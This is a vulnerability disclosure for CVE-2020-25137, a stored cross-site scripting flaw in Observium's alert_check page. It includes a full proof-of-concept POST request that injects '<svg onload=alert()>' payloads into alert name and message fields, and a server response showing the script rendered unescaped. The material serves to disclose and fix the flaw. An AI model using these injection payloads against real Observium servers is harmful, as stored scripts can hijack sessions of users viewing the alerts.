CVE-2020-25137 | |
------------------------------------------ | |
Cross Site Scripting in alert_check | |
------------------------------------------ | |
[Description] | |
Penetration test has shown that the application is vulnerable to Cross-Site Scripting (XSS) due to the fact that it is possible to inject and store malicious JavaScript code within it. ------------------------------------------ | |
[Additional Information] | |
Example request that allows to trigger XSS payload. | |
POST /alert_check/alert_test_id=6/ HTTP/1.1 | |
Host: localhost | |
Connection: close | |
Content-Length: 281 | |
Content-Type: application/x-www-form-urlencoded | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | |
Cookie: OBSID=tpd8kh67hrtn6amqhqfqich6fu0f5gpq; ckey=ded90eb088c29c15976307a4e5db59e0; dkey=efbae2c2a415a9dc0544005f8fd6ef80; observium_screen_ratio=0.8999999761581421; observium_screen_resolution=3840x2160 | |
alert_test_id=6&alert_name=xyz1231337%3Csvg+onload%3Dalert%281%29%3E&alert_message=xyz1231338%3Csvg+onload%3Dalert%282%29%3E&alert_delay=111&alert_send_recovery=1&alert_severity=crit&action=alert_details&requesttoken=d00602b321a321c97928d8d9cfe030f402b6c056fecedea31cd73639afee9d01 | |
Partial of server response: | |
HTTP/1.1 200 OK | |
Date: Wed, 12 Aug 2020 11:03:16 GMT | |
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.2k-fips PHP/7.0.30 | |
Strict-Transport-Security: max-age=63072000; includeSubdomains; | |
X-Frame-Options: DENY | |
X-Powered-By: PHP/7.0.30 | |
Expires: Thu, 19 Nov 1981 08:52:00 GMT | |
Cache-Control: no-store, no-cache, must-revalidate | |
Pragma: no-cache | |
Set-Cookie: OBSID=tpd8kh67hrtn6amqhqfqich6fu0f5gpq; expires=Wed, 12-Aug-2020 11:33:17 GMT; Max-Age=1800; path=/; secure;HttpOnly;Secure | |
X-XSS-Protection: 1; mode=block | |
X-Permitted-Cross-Domain-Policies: none | |
Content-Security-Policy: sandbox allow-forms allow-scripts allow-same-origin; | |
X-Content-Type-Options: nosniff | |
Connection: close | |
Content-Type: text/html; charset=UTF-8 | |
Content-Length: 1232438 | |
<!DOCTYPE html> | |
<html lang="en"> | |
<head> | |
<base href="https://localhost/"/> | |
<meta http-equiv="content-type" content="text/html; charset=utf-8"/> | |
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/> | |
(…) | |
<div class="box-header with-border"> | |
<h3 class="box-title">xyz1231337<svg onload=alert(1)></h3> | |
</div> | |
------------------------------------------ | |
[VulnerabilityType Other] | |
Cross Site Scripting | |
------------------------------------------ | |
[Vendor of Product] | |
https://www.observium.org/ | |
------------------------------------------ | |
[Affected Product Code Base] | |
Professional, Enterprise & Community 20.8.10631 | |
------------------------------------------ | |
[Affected Component] | |
alert_check | |
------------------------------------------ | |
[Attack Type] | |
Remote | |
------------------------------------------ | |
[Reference] | |
https://github.com/OWASP/ASVS/blob/master/4.0/en/0x13-V5-Validation-Sanitization-Encoding.md | |
https://www.owasp.org/images/b/bc/OWASP_Top_10_Proactive_Controls_V3.pdf | |
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001) | |
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002) | |
https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001) | |
------------------------------------------ | |
[Discoverer] | |
Mariusz Popławski | |
------------------------------------------ | |
Mariusz Popławski / AFINE.com team |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment